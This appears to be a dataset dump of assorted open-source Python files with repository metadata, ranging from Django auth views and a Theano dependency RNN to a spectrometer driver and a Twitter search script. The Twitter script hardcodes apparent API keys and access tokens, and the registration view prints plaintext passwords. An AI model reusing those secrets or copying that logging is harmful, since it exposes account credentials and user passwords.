if user is not None:
print('User found')
login(request, user)
return redirect('home')
else:
print('Non existing user')
messages.error(request, 'oops! username or password does not exists!')
context = {'title': 'Home'}
return render(request, 'index.html', context=context)
def logout_user(request):
logout(request)
return redirect('home')
class RegistrationView(View):
def get(self, request):
return redirect('home')
def post(self, request):
if request.method == 'POST':
# get user model
User = get_user_model()
# clean data
username = strip_tags(request.POST.get('username'))
password = strip_tags(request.POST.get('password1'))
conf_password = strip_tags(request.POST.get('password2'))
first_name = strip_tags(request.POST.get('first_name'))
last_name = strip_tags(request.POST.get('last_name'))
email = strip_tags(request.POST.get('email'))
error_msg = []
# check if passwords are identical; if not, raise error
if password == conf_password:
pass
else:
print(password, conf_password, sep=' is matching to ')
print('password err')
error_msg.append('Passwords do not match')
# check if email is valid; if not, raise error
if email:
if validate_email(email) is None:
print(validate_email(email))
pass
else:
print('email err')
error_msg.append('Invalid email')
else:
error_msg.append('kindly enter email')
# check if username is taken and Email are taken
try:
user_with_username = User.objects.get(username=username)
except:
user_with_username = None
if user_with_username:
error_msg.append('Username Already Taken !')
# check if email is taken
try:
user_with_mail = User.objects.get(email=email)
except:
user_with_mail = None
if user_with_mail:
error_msg.append('Email Already exists!')
context = {'title': 'error', 'messages': error_msg}
# if error is raised redirect to home
if error_msg:
return render(request, 'index.html', context=context)
# If No error was raised, Create User
else:
try:
User = get_user_model()
user = User.objects.create(username=username, email=email, first_name=first_name,
last_name=last_name)
print('user created')
user.set_password(password)
user.save()
return render(request, 'index.html', context={'messages': ['user created successfully',
'Login to continue']})
except Exception as e:
print(e)
return render(request, 'index.html', context={'messages': e})
| [
"rohitraazanand567@gmail.com"
] | rohitraazanand567@gmail.com |
3e887db0012fd95d348ed1d1b493cf4547ef7a32 | 26c8f5c0c29c50566209efdc7e05b6e7454d9e20 | /solutions/40.Combination Sum II.py | 77b3b414809466b79fb434f08a135f9576267283 | [] | no_license | ZhiCheng0326/LeetCode-Practices | b47f1343db5b82693220ade4bf76ada0e79eba13 | 9ebffde8fdd1038a3e4b763f65e4b6ef58281e79 | refs/heads/main | 2023-08-24T05:25:24.423627 | 2021-10-02T11:14:50 | 2021-10-02T11:14:50 | 327,869,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | class Solution:
def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:
candidates.sort()
ans = []
def backtrack(path, choices, cur_sum):
for ind, c in enumerate(choices):
# avoid duplicate answer
if ind-1 >= 0 and choices[ind-1] == choices [ind]: continue
# make choices
path.append(c)
cur_sum += c
# pruning
if cur_sum > target:
cur_sum -=c
path.pop()
return
elif cur_sum == target:
ans.append(path[:])
cur_sum -=c
path.pop()
return
# backtracking
backtrack(path, choices[ind+1:], cur_sum)
# revert
cur_sum -=c
path.pop()
backtrack([], candidates, 0)
return ans
| [
"zhichenglee97@gmail.com"
] | zhichenglee97@gmail.com |
097c22b3ba2d42fc913c97b1d532bd33763b4d2f | 96325a6b827816f2bdf800d5357e4edd11c9ec23 | /py_files/dataregister.py | 5527e7db0810941700c72d15eeb68d359ade42c0 | [] | no_license | prakirt/Multicycle_RISC_Processor | 24c60c865a4f434737022ec10d69270755f9e9ff | c4394aa9ceb0e60873429f8715e87ff06e42358f | refs/heads/master | 2021-06-09T15:25:21.415963 | 2016-12-05T16:41:26 | 2016-12-05T16:41:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | #import math
file_de = open("tracefile_dataregister.txt", "w")
k=0
d = 0
for i in xrange(0,2**10):
k = 1-k
file_de.write('{0:01b}'.format(k))
file_de.write(' ')
file_de.write('{0:016b}'.format(i))
file_de.write(' ')
file_de.write('{0:016b}'.format(d))
file_de.write("\n")
if k==1 :
d = i
file_de.close()
| [
"prakirt2203@gmail.com"
] | prakirt2203@gmail.com |
3c7f3313ec6b47c8cae77a82be48002ac201189d | fb4e64ebc1dc66335f25eaa63bf602fdd9ebd817 | /app/irsystem/models/helpers.py | 701f17912f15e0b96143a68d7bc4659608586904 | [] | no_license | mahin-mac568/Game-Recommender | bb90880d05dfb9ef41dc84f3982b07f8c1cc4c71 | b3e5477b86646781fa22c7b9d8f903ea2ffe18af | refs/heads/main | 2023-07-14T12:18:16.762938 | 2021-08-22T22:15:48 | 2021-08-22T22:15:48 | 398,303,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | # Methods to compose HTTP response JSON
from flask import jsonify
import base64
import json
import numpy as np
def http_json(result, bool):
result.update({ "success": bool })
return jsonify(result)
def http_resource(result, name, bool=True):
resp = { "data": { name : result }}
return http_json(resp, bool)
def http_errors(result):
errors = { "data" : { "errors" : result.errors["_schema"] }}
return http_json(errors, False)
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
"""If input object is an ndarray it will be converted into a dict
holding dtype, shape and the data, base64 encoded.
"""
if isinstance(obj, np.ndarray):
if obj.flags['C_CONTIGUOUS']:
obj_data = obj.data
else:
cont_obj = np.ascontiguousarray(obj)
assert(cont_obj.flags['C_CONTIGUOUS'])
obj_data = cont_obj.data
data_b64 = base64.b64encode(obj_data)
return dict(__ndarray__=data_b64,
dtype=str(obj.dtype),
shape=obj.shape)
# Let the base class default method raise the TypeError
return json.JSONEncoder(self, obj)
def json_numpy_obj_hook(dct):
"""Decodes a previously encoded numpy ndarray with proper shape and dtype.
:param dct: (dict) json encoded ndarray
:return: (ndarray) if input was an encoded ndarray
"""
if isinstance(dct, dict) and '__ndarray__' in dct:
data = base64.b64decode(dct['__ndarray__'])
return np.frombuffer(data, dct['dtype']).reshape(dct['shape'])
return dct
| [
"mac568@cornell.edu"
] | mac568@cornell.edu |
cf33a939113ba50e04343dea146fe5038258eddf | 67a5295569a0810ae8e7082d661fce5d37b02cf9 | /listas2.py | 29e892186ad578936b01764a1c9156a7c4626792 | [] | no_license | thiagoabreu93/ed-not-2021-2 | e4b6ca8a42a0b464ad73de5555e2ccda825ca875 | 4b4b3e077c0cf86ed564b502f69854205cbc7ac2 | refs/heads/master | 2023-07-16T03:24:06.627160 | 2021-09-02T23:29:04 | 2021-09-02T23:29:04 | 391,197,856 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # range(): gera uma faixa de números
# range() com 1 argumento: gera uma lista de números
# que vai de zero até argumento - 1
for i in range(10):
print(i)
print('------------------------')
# range() com 2 argumentos: gera uma lista de números começando pelo primeiro argumento (inclusive) até o segundo argumento (exclusive)
for j in range(5, 15):
print(j)
print('-------------------------')
# range() com três argumentos:
# 1º: limite inferior (inclusive)
# 2º: limite superior (exclusive)
# 3º: passo (de quanto em quanto a lista irá andar)
for k in range(1, 22, 3):
print(k)
print('-------------------------')
for n in range(10, 0, -1):
print(n)
| [
"thiago.abreu3@fatec.sp.gov.br"
] | thiago.abreu3@fatec.sp.gov.br |
cb8c2b2d2312bb6962eeed0a36a04d06b423f648 | a12b4bd6176ab2a9bf84c919d5cdbed7e8e42a20 | /shared/common_response.py | fdafb69c8f517c3bd2674420cc0b9e5e79647e77 | [] | no_license | tsrnd/dp-world-tour | b3f82dde21faf2fa3a0cc9bd8cca23994e70b4c7 | 9fd8d4e9c40aa372bf89db05f82cf28043e9020e | refs/heads/master | 2020-04-15T20:14:21.659086 | 2019-02-15T06:46:44 | 2019-02-15T06:46:44 | 164,984,114 | 0 | 0 | null | 2019-02-20T04:36:34 | 2019-01-10T03:37:38 | JavaScript | UTF-8 | Python | false | false | 298 | py | ValidateResponse = {
"message": "validation error",
"fields": "",
}
NotFoundResponse = {
"message": "404 Not Found",
}
InternalResponse = {
"message": "Internal server response",
}
ForbiddenResponse = {
"message": "You have not permission to access this content currently"
}
| [
"hung.nguyen@asiantech.vn"
] | hung.nguyen@asiantech.vn |
87484608d3e765293a94a2c87f82b381dcf74eb5 | 19e898ab83801d32c732d191d30db61c785342ad | /tweetSearch.py | a4d62222af1eb53a4ea200f49e0c16cec4075768 | [] | no_license | rchen27/htechLab4 | 5c1b80c12ab260d3f5453d44d48ee51a3260f3f6 | 7fb7c93784efe5cf6c34b00189052f2d57448d74 | refs/heads/master | 2021-01-10T05:03:55.865590 | 2016-01-21T18:18:14 | 2016-01-21T18:18:14 | 47,301,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | from TwitterSearch import *
try:
tso = TwitterSearchOrder()
#tso.set_keywords(['suffering', 'depression', 'I', 'my'])
tso.set_keywords(['the', 'a'])
tso.set_language('en')
tso.set_include_entities(False)
ts = TwitterSearch(
consumer_key = '1kj4GBRevJITV4S40kLXGHVG2',
consumer_secret = 'c80dJF41IwQV2G4ynR8VYblMQU15M4bc8OFg3aG6l8Y0aoSFhU',
access_token = '1708110452-e3unR8gR7WRMGDoCh3aZutMPL3bFBLFlqHz8tzy',
access_token_secret = 'kkiZDDp8KXLB8cRDwsMqBDc5IxqiaVXSmbQ2XtZEij0tl'
)
for tweet in ts.search_tweets_iterable(tso):
print tweet['user']['screen_name']
except TwitterSearchException as e: # take care of all those ugly errors if there are some
print(e) | [
"rc554@cornell.edu"
] | rc554@cornell.edu |
e86009b41457fd75b15ddc6028526a9d5f76d72b | 53271a00951b50fe33daf1cdd6e3f8eaa3c50cee | /Database2.py | 728cc6c97994f72a55111353b6f608a9aefc24e2 | [] | no_license | shohagrana64/cse716-ddbms-project | 29139a361331bb997fa1cb6efa1a863a2d7d51f6 | 5726cdd5e68c707e1c8fd4051e18f3a93e586380 | refs/heads/main | 2023-08-03T12:14:39.324121 | 2021-09-25T17:10:48 | 2021-09-25T17:10:48 | 410,208,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | import sqlite3
conn = sqlite3.connect('database2_new.db')
c = conn.cursor()
print("Connection Opnend!")
print("reading commands!\n\n")
fd = open('database_latest.sql', 'r')
sqlFile = fd.read()
fd.close()
# all SQL commands (split on ';')
sqlCommands = sqlFile.split(';')
# Execute every command from the input file
value = 0
print("excecuting Commands\n\n")
for command in sqlCommands:
command = command + ';'
print(command)
c.execute(command)
value = value + 1
conn.commit()
conn.close()
print("closed connection")
| [
"shohagrana64@gmail.com"
] | shohagrana64@gmail.com |
7953cb9444df85fce62f70ac70bc0aeea294fb21 | f5e9f3f69094da603a5197824b6da894d79726fa | /thorlabs/spectrometer/CCS.py | 2e1be7add39f2b442be6fcf07b6ea5f143171fe2 | [] | no_license | 7joseph/pylabinstrument | 5c57225ab819417d28c8081cfef6578b975236f8 | 154240ce5ab4337129c7b118a32d97f2d080a46e | refs/heads/master | 2023-01-19T23:24:20.606216 | 2020-11-27T18:16:26 | 2020-11-27T18:16:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,761 | py | from ctypes import (
byref
)
import ctypes
from ...ctools import _visa_enum as enum
from .tools import _TLCCS_wrapper as K
from ..templates.VisaObject import VisaObject
from visa import constants as vicons
from time import sleep
import numpy as np
SCANNING = 1
PIX_NUM = 3648
class CCS(VisaObject):
def __init__(self, resourceName, modelName = '', name=''):
super().__init__(resourceName, modelName, name)
self.library = K
self.integrationTime = 0.01
self.averageNumber = 5
self.pixel_num = PIX_NUM
@property
def averageNumber(self):
return self._averageNumber
@averageNumber.setter
def averageNumber(self, value):
self._averageNumber = value
@property
def integrationTime(self):
return self._integrationTime
@integrationTime.setter
def integrationTime(self, value):
self._integrationTime = value
@property
def library(self):
return self._library
@library.setter
def library(self, value):
self._library = value
#############################################################
def open(self):
"""
This function initializes the instrucment driver and perform initialization actions (according to Thorlabs TLPM library).
"""
self.verboseMessage('Establishing session...')
idquery = enum.ViBoolean()
resetDevice = enum.ViBoolean()
instrumentHandle = enum.ViSession()
status = self.library.Open(self.resourceName_c, idquery, resetDevice, byref(instrumentHandle))
if status==vicons.VI_SUCCESS:
self.verboseMessage('Done establishing session.')
self.instrumentHandle = instrumentHandle
self.idQuery = idquery
self.resetDevice = resetDevice
self.setIntegrationTime(self.integrationTime)
else:
raise Exception('Failed to establish session with device. Error code: {} : {}.'.format(status))
return status
def close(self):
if self.isInSession:
self.verboseMessage('Closing session...')
status = self.library.Close(self.instrumentHandle)
if status==vicons.VI_SUCCESS:
self.verboseMessage('Done closing session.')
self.idQuery = None
self.resetDevice = None
self.instrumentHandle = None
def getStatus(self):
if self.isInSession:
dstatus = ctypes.c_int32()
status = self.library.GetDeviceStatus(self.instrumentHandle, byref(dstatus))
if status == vicons.VI_SUCCESS:
return dstatus
else:
raise self.notInSessionMsg()
def sweep(self, avgN=1, waitTime=0):
"""
avgN -- a number of averaging
waitTime -- time in second to wait before the next sweep
"""
if self.isInSession:
self.verboseMessage('Sweeping {} time(s)...'.format(avgN))
datas = np.zeros((avgN, 3648), dtype=np.float)
for i in range(avgN):
status = self.library.StartScan(self.instrumentHandle)
sleep(0.1)
while self.getStatus==1: #still scanning
sleep(0.1)
data = (ctypes.c_double*3648)()
status = self.library.GetScanData(self.instrumentHandle, data)
datas[i] = np.ctypeslib.as_array(data)
if waitTime>0:
sleep(waitTime)
wl = self.getWavelength()
self.verboseMessage('Done sweeping {} time(s).'.format(avgN))
return (datas, wl)
else:
raise self.notInSessionMsg()
def sweepAvg(self):
if self.isInSession:
(datas, wl) = self.sweep(self.averageNumber, waitTime=0)
return (np.mean(datas, axis=0), wl)
else:
raise self.notInSessionMsg()
def getWavelength(self, dataset=0):
assert dataset == 0 or data==1, 'Accept only 0 (factory setting) or 1 (user defined).'
if self.isInSession:
data = (ctypes.c_double*3648)()
minWL = ctypes.c_double()
maxWL = ctypes.c_double()
status = self.library.GetWavelengthData(self.instrumentHandle, ctypes.c_int16(dataset), data, byref(minWL), byref(maxWL))
if status == vicons.VI_SUCCESS:
return np.ctypeslib.as_array(data)
else:
raise self.notInSessionMsg()
def getIntegrationTime(self):
"""
Return integration time in seconds.
"""
if self.isInSession:
time = ctypes.c_double()
status = self.library.GetIntegrationTime(self.instrumentHandle, byref(time))
if status==vicons.VI_SUCCESS:
self.integrationTime = time.value
return time.value
else:
raise Exception('Failed to get integration time')
else:
raise self.notInSessionMsg()
def setIntegrationTime(self, sec):
"""
sec -- integration time in second
"""
assert 1e-5<=sec<=6, 'Integration time must be between 1e-5 to 6 seconds.'
if self.isInSession:
self.verboseMessage('Setting integration time...')
status = self.library.SetIntegrationTime(self.instrumentHandle, ctypes.c_double(sec))
if status==vicons.VI_SUCCESS:
self.verboseMessage('Done setting integration time.')
self.integrationTime = sec
else:
raise Exception('Failed to set integration time.')
else:
raise self.notInSessionMsg()
| [
"psk.light@gmail.com"
] | psk.light@gmail.com |
aa7bdd53cc66e167cb8bf02a2be09310a99dd9f7 | 3c7ece5a516bd79c0ca8a5ecb2722119ed8f4dc9 | /Lesson_19_django2/pizza_project_ETALON/env/Scripts/django-admin.py | fecee6cf6ca80854173cead8c151345dbdae093a | [] | no_license | Bariss77/Lesson_PYTHON | 7340b2a4f8f43090b5bd8f0469230c53e9eaf306 | c90c88e13701a950d0f777858149f9bbdf9f1f9a | refs/heads/master | 2020-04-08T19:19:41.598888 | 2018-12-01T20:47:01 | 2018-12-01T20:47:01 | 158,188,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | #!c:\users\boris\desktop\pizza_project\env\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"37667717+Bariss77@users.noreply.github.com"
] | 37667717+Bariss77@users.noreply.github.com |
67f5c55631f312db567588bced798fff06c0dce3 | dbdc5835bd2e7c5dd924f35cdf4f66962ff2d59f | /Section-2/Simple_Linear_Regression/venv/bin/rst2html4.py | 78fc2e656b9c52a7d0a1f0b488d9c2f0fb9f47bf | [] | no_license | nikhilkumar9687/ML_code_in_Python | cdf0aafbb04b93bcefedd1350a5fe346c16ba147 | 692a43913113a6220aa6a909d83324e479757082 | refs/heads/master | 2022-10-06T12:58:36.029058 | 2020-06-08T20:25:19 | 2020-06-08T20:25:19 | 266,406,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | #!/home/nikhil/Desktop/Machine+Learning+A-Z+(Codes+and+Datasets)/My_Code/Section-2/Simple_Linear_Regression/venv/bin/python
# $Id: rst2html4.py 7994 2016-12-10 17:41:45Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing (X)HTML.
The output conforms to XHTML 1.0 transitional
and almost to HTML 4.01 transitional (except for closing empty tags).
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML documents from standalone reStructuredText '
'sources. ' + default_description)
publish_cmdline(writer_name='html4', description=description)
| [
"kumar.nikhil9687@gmail.com"
] | kumar.nikhil9687@gmail.com |
0220d3837c405599a30e3ed23a1e342c7630735f | ee3e2a327a70a2800c8d2d54b5aaa1bb14e2d61f | /hc/blog/models.py | c021d9283012bab9a4ed9b2109d061240dbca7b5 | [
"BSD-3-Clause"
] | permissive | skapeyi/healthchecks | bdb1b693df1060391e633bc3e0b38e417bdaf89b | 286baa0e1b7a3ecf554c8785c4aa3dd77a9d9a4d | refs/heads/master | 2020-03-18T22:56:26.854718 | 2018-06-05T06:39:13 | 2018-06-05T06:39:13 | 135,373,769 | 0 | 0 | null | 2018-05-30T01:54:13 | 2018-05-30T01:54:13 | null | UTF-8 | Python | false | false | 1,092 | py | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models import permalink
class Category(models.Model):
title = models.CharField(max_length=100)
slug = models.SlugField(max_length=100)
def __str__(self):
return self.title
@permalink
def get_absolute_url(self):
return ('view_blog_post', None, {'slug': self.slug})
class Post(models.Model):
title = models.CharField(max_length=254, unique=True)
slug = models.SlugField(max_length=100, unique=True)
text = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
published = models.BooleanField(default=False)
published_date = models.DateTimeField(blank=True)
user = models.ForeignKey(User, blank=True, null=True)
category = models.ForeignKey(Category, blank=True)
def __str__(self):
return self.title
@permalink
def get_absolute_url(self):
return ('view_blog_post', None, {'slug': self.slug})
| [
"skapeyi@bitbucket.org"
] | skapeyi@bitbucket.org |
6f819961c414aac55a990e2f55d591fa7021693d | ffd6bc549caad10ee99ed20a13b0dac51393f24a | /audioTrackExtractor/downloader/downloader.py | fff7a0bb5dc4cf817bbd645d3a8eadbac55da9a6 | [] | no_license | giovaninppc/MC030 | 52a579290e0dcd1d28744f9ac98f49a8857ae275 | 382a60e330f1cdbb82fa8648029fa410db6a5cf5 | refs/heads/master | 2022-12-14T19:53:49.604330 | 2022-09-13T16:53:12 | 2022-09-13T16:53:12 | 208,359,198 | 2 | 0 | null | 2022-12-11T08:42:36 | 2019-09-13T22:56:44 | Python | UTF-8 | Python | false | false | 539 | py | import sys
from pytube import YouTube
class PytubeDownloader():
def downloadVideo(self, url: str, outputFilename = 'temp'):
yt = YouTube(url)
print(yt)
streams = yt.streams
# Select mp4 stream
stream = streams.filter(mime_type = 'video/mp4').first()
stream.download(filename = outputFilename)
if __name__ == "__main__":
videoURL = sys.argv[1]
outputPath = sys.argv[2]
downloader = PytubeDownloader()
downloader.downloadVideo(videoURL, outputFilename = outputPath)
| [
"giovani.x.pereira@gmail.com"
] | giovani.x.pereira@gmail.com |
63b3181bdc60301fadd00b58d77e60a6de34be81 | 5805ef6884e64d715d71a495f6295b317bcb545c | /007.py | 8b23fd87158641054a1e995a081099c41e25f035 | [] | no_license | simonhessner/projecteuler | 9fac0a91b3f30809353bf45850391d916d413ca2 | 3b734a2b6f7f503909cce9528305afa275e53252 | refs/heads/master | 2021-09-07T23:48:51.228556 | 2018-03-03T15:14:51 | 2018-03-03T15:14:51 | 113,055,169 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | #!/usr/bin/python3
# https://projecteuler.net/problem=7
import math
def primes(number):
while True:
if is_prime(number):
yield number
number += 1
def is_prime(number):
if number == 2:
return True
if number == 1 or number % 2 == 0:
return False
for div in range(3, int(math.sqrt(number)+1), 2): #skip even divisors
if number % div == 0:
return False
return True
prime = 0
for i in range(10001):
prime = next(primes(prime+1))
print(prime) | [
"uldci@student.kit.edu"
] | uldci@student.kit.edu |
8ec13516a554596ee1f695900c29653ca4ca824a | 76c3d64fc39112fb78b14e381b7df39741534e69 | /reviews/migrations/0003_auto_20210122_1432.py | eef2ccf58ab56204b7978815bd58296e780990f0 | [] | no_license | MunnazzahAslam/newsreel | 1c10d78dfa4465aad08a71c0ec88f905c59b05ae | 43bfc524ba08675363b2a0db9788827ad9e2cfe6 | refs/heads/main | 2023-03-30T16:18:43.330509 | 2021-04-07T19:43:07 | 2021-04-07T19:43:07 | 355,568,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | # Generated by Django 3.1.5 on 2021-01-22 14:32
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reviews', '0002_review_rating'),
]
operations = [
migrations.AddField(
model_name='review',
name='agreed',
field=models.ManyToManyField(related_name='agreed', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='review',
name='disagreed',
field=models.ManyToManyField(related_name='disagreed', to=settings.AUTH_USER_MODEL),
),
]
| [
"aslammunnazzah@gmail.com"
] | aslammunnazzah@gmail.com |
47bc571dda56b8ddb2b1676d90162a28af5f65d2 | 8401f24efc2f55c92322872a3c2e739311fb3b9b | /Homework3_2/Homework3/dependencyRNN.py | be41fcd426ca07533381a17db8522fbae25c1406 | [] | no_license | sloanchoi1124/nlp_stuff | dda16236e595c0cf6ce716e0e7284545505e8abf | 42c82f17a1bacb8b2b64c39ee149c6025719513d | refs/heads/master | 2021-01-19T18:51:02.939983 | 2017-04-16T01:55:49 | 2017-04-16T01:55:49 | 88,384,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,962 | py | import json
from math import sqrt
from collections import OrderedDict, defaultdict
import theano
import theano.tensor as T
import numpy as np
from adagrad import Adagrad
class DependencyRNN:
'''
class for dependency RNN for QANTA
'''
def __init__(self, d, V, r, answer_idxs, embeddings=None, seed=0):
'''
d = dimensionality of embeddings
V = size of vocabulary
r = number of dependency relations
answer_idxs = list of indices into the embeddings matrix for all the answers
embeddings = pre-trained word embeddings
seed = for random number generator for reproducivility
'''
self.d = d
rnge = sqrt(6) / sqrt(201)
rnge_we = sqrt(6) / sqrt(51)
np.random.seed(seed)
#|V| x d embedding matrix
if embeddings is None:
self.We = theano.shared(name='embeddings',
value=np.random.rand(V, d) * 2 * rnge_we - rnge_we
).astype(theano.config.floatX)
else:
self.We = theano.shared(name='embeddings',
value=embeddings
).astype(theano.config.floatX)
#r x d x d tensor (matrix for each dependency relation)
self.Wr = theano.shared(name='dependencies',
value=np.random.rand(r, d, d) * 2 * rnge - rnge
).astype(theano.config.floatX)
#d x d map from embedding to hidden vector
self.Wv = theano.shared(name='Wv',
value=np.random.rand(d, d) * 2 * rnge - rnge
).astype(theano.config.floatX)
#d long bias vector
self.b = theano.shared(name='b',
value=np.zeros(d, dtype=theano.config.floatX))
#self.params = [self.We, self.Wr, self.Wv, self.b]
self.params = [self.Wr, self.Wv, self.b]
self.answer_idxs = np.array(answer_idxs, dtype=np.int32)
self.ans_probabilities = np.ones(self.answer_idxs.shape[0])/(self.answer_idxs.shape[0]-1)
self.ans_lookup = {j:i for i,j in enumerate(self.answer_idxs)}
self._answers = {}
self.descender = Adagrad(self.params)
def normalized_tanh(x):
'''returns tanh(x) / ||tanh(x)||'''
tanh_x = T.tanh(x)
#use dot dot product
tanh_x_abs = T.sqrt((tanh_x ** 2).sum())
return tanh_x / tanh_x_abs
self.f = normalized_tanh
#need to calculate both the input to its parent node and the error at this step
def recurrence(n, hidden_states, hidden_sums, cost, x, r, p, wrong_ans, corr_ans):
'''
function called below by scan over the nodes in the dependency parse
n - this is the index of the current node
hidden_states - a list of hidden_states for every node, to be updated
hidden_sums - sum over the children of dot product of the hidden nodes and the relation matrix
cost - the total cost so far for this tree
x - a list of word embeddings (x[n] will access the embedding for the current word)
r - a list of relation matrices (r[n] will access the current matrix)
p - a list of parent node indices
wrong_ans - a list of randomly sampled word embeddings for wrong answers
corr_ans - the word embedding for the correct answer
You need to calculate 3 things:
1) The value of hidden_states[n] : h_n = f(W_v \dot x_n + b + sum_n)
2) The updated value of hidden_sums[p[n]] : hidden_sums[p[n]] + r(n) \dot h_n
3) The updated cost :
for a single node, this is \sum_{z \in wrong_ans} max(0, 1 - x_c \dot h_n + x_z \dot h_n)
you need to return the updates to hidden_states, hidden_sums, and cost
(in that order)
'''
#value of hidden_states[n]
h_n= self.f(T.dot(self.Wv, x[n]) + self.b + hidden_sums[n])
new_states = T.set_subtensor(hidden_states[n], h_n)
#updated value of hidden_sums[p[n]]
h_sums_p_n = hidden_sums[p[n]] + T.dot(r[n], h_n)
new_sum = T.set_subtensor(hidden_sums[p[n]], h_sums_p_n)
#updated cost
outputs_info = T.as_tensor_variable(np.asarray(0, theano.config.floatX))
result, updates = theano.scan(fn = single_point_cost,
sequences = wrong_ans,
outputs_info = outputs_info,
non_sequences = [h_n, corr_ans])
#cost_update = theano.function(inputs=[wrong_ans, h_n, corr_ans], outputs = result, updates = updates)
#cost_update_result = cost_update(wrong_ans, h_n, corr_ans)
return [new_states, new_sum, result[-1]+cost]
def single_point_cost(new_wrong_ans, outputs_info, h_n, corr_ans):
return outputs_info + T.maximum(T.as_tensor_variable(np.asarray(0, theano.config.floatX)), T.as_tensor_variable(np.asarray(1, theano.config.floatX)) - T.dot(corr_ans, h_n) + T.dot(new_wrong_ans, h_n))
idxs = T.ivector('idxs')
x = self.We[idxs]
rel_idxs = T.ivector('rel_idxs')
r = self.Wr[rel_idxs]
p = T.ivector('parents')
wrong_idxs = T.ivector('wrong_idxs')
wrong_ans = self.We[wrong_idxs]
corr_idx = T.iscalar('corr_idx') # index of answer
corr_ans = self.We[corr_idx]
hidden_states = T.zeros((idxs.shape[0], d), dtype=theano.config.floatX)
#needs to be sent_length + 1 to store final sum
hidden_sums = T.zeros((idxs.shape[0]+1, d), dtype=theano.config.floatX)
[h, s, cost], updates = theano.scan(fn=recurrence,
sequences=T.arange(x.shape[0]),
outputs_info=[hidden_states,
hidden_sums,
T.as_tensor_variable(np.asarray(0, theano.config.floatX))],
non_sequences=[x, r, p, wrong_ans, corr_ans])
final_states = h[-1]
self.states = theano.function(inputs=[idxs, rel_idxs, p, wrong_idxs, corr_idx], outputs=final_states)
final_cost = cost[-1] #no regularization
gradients = T.grad(final_cost, self.params)
self.cost_and_grad = theano.function(inputs=[idxs, rel_idxs, p, wrong_idxs, corr_idx], outputs=[final_cost] + gradients)
def gradient_descent(self, new_gradients):
self.descender.gradient_descent(*new_gradients)
#batch consists of tuples of word indices, relation indices, parent indices, and an answer index
def train(self, batch, num_wrong_ans=100):
total_cost_and_grad = None
total_nodes = 0.
#split data into batches, then into minibatches for multiprocessing
for datum in batch:
idxs, rel_idxs, p, corr_idx = datum
#sample new wrong answers for every point (make sure not to sample the correct answer)
self.ans_probabilities[self.ans_lookup[corr_idx]] = 0
wrong_idxs = self.answer_idxs[np.random.choice(self.answer_idxs.shape[0],
num_wrong_ans,
False,
self.ans_probabilities)]
self.ans_probabilities[self.ans_lookup[corr_idx]] = 1./(self.ans_probabilities.shape[0]-1)
cost_and_grad = self.cost_and_grad(idxs, rel_idxs, p, wrong_idxs, corr_idx)
if total_cost_and_grad is None:
total_cost_and_grad = [0] + [np.zeros(i.shape) for i in cost_and_grad[1:]]
for i in range(len(cost_and_grad)):
total_cost_and_grad[i] += cost_and_grad[i]
total_nodes += len(idxs)
#update gradients from total_cost_and_grad[1:]
self.gradient_descent([i/total_nodes for i in total_cost_and_grad[1:]])
return total_cost_and_grad[0]/total_nodes
def reset_weights(self):
self.descender.reset_weights()
def transform(self, batch, stop_indices=None):
features = []
for idxs,rel_idxs,p in batch:
h = self.states(idxs, rel_idxs, p, [], 0)
x = np.zeros(self.d)
count = 0.0
for i,s in enumerate(h):
if stop_indices is None or idxs[i] not in stop_indices:
x += s
count += 1
features.append(x / count)
return(np.array(features))
def save(self, filename, answers):
'''save all the weights and hyperparameters to a file'''
kwds = {}
for param in self.params:
kwds[param.name] = param.get_value()
kwds['answer_idxs'] = self.answer_idxs
with open(filename, 'wb') as f:
np.savez(f, **kwds)
embeddings = self.We.get_value()
for answer in answers:
self._answers[answer] = embeddings[answers[answer]].tolist()
with open(filename + '.json', 'w') as f:
json.dump(self._answers, f)
@classmethod
def load(cls, filename):
'''load pre-trained weights from a file'''
with open(filename) as f:
npzfile = np.load(f)
d = npzfile['embeddings'].shape[1]
V = npzfile['embeddings'].shape[0]
r = npzfile['dependencies'].shape[0]
d = cls(d, V, r, npzfile['answer_idxs'])
for param in d.params:
param.set_value(npzfile[param.name])
with open(filename + '.json') as f:
d._answers = json.load(f)
return d
@property
def answers(self):
return self._answers
| [
"xc2315@barnard.edu"
] | xc2315@barnard.edu |
246b0476cf8c2531744051a05c4b6a1b6a94b575 | 71969e3559d93efbd560265db5264b1d93ddaaa2 | /LSpider/urls.py | 9206fa2394bfa78e8e9f921e98893e22ef2bdb57 | [
"MIT"
] | permissive | morole/LSpider | e3cc28c4afd060325d12a622c587cb45841a6e6d | 1dcdd820a8c0520cc8b3c851a5ba7bd06fcbf2f8 | refs/heads/master | 2023-06-20T21:58:43.979326 | 2021-08-02T02:36:45 | 2021-08-02T02:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | """LSpider URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
